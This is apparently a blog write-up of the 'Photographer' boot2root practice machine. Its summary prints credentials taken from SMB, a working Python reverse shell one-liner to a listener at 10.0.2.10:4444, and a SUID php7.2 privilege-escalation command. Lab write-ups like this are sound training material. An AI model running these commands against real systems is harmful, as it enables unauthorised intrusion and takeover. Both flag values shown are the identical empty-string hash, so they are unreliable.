Post

Photographer

Description ⤵️

💡 Photographer : 1 ⤵️

This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.

Let’s find the IP Address first »

1
IP : 10.0.2.25

Port Scan Results ➡️

124-1.png

124-2.png

1
2
3
4
5
OPEN PORTS >
80   HTTP
139  SMB
445  SMB
8000 HTTP

Web Enumeration ⤵️

125-1.png

Lets first do some directory traversal →

127-1.png

125-2.png

125-3.png

Lets check the SMB part →

128-1.png

128-2.png

128-3.png

1
2
3
4
5
6
7
Lets try these credentials → 
→ agi@photographer.com
→ daisa@photographer.com
→ my babygirl
So the final credentials were → 
ID     : daisa@photographer.com
pass : babygirl

128-4.png

Now after login to koken site Let is further Enumerate →

125-4.png

Let is follow the exploit path →

125-5.png

125-6.png

got the results →

125-7.png

Then I executed the python reverse shell code and I got this →

126-1.png

126-2.png

1
user.txt → d41d8cd98f00b204e9800998ecf8427e

while cheching the SUID file I got this →

126-3.png

126-4.png

126-5.png

126-6.png

1
proof.txt → d41d8cd98f00b204e9800998ecf8427e


Summery Notes →

💡 Koken 0.22.24

daisa@photographer.com

agi@photographer.com

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

.**/**usr**/**bin**/**php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"


If you have any questions or suggestions, please leave a comment below. Thank You !

This post is licensed under CC BY 4.0 by the author.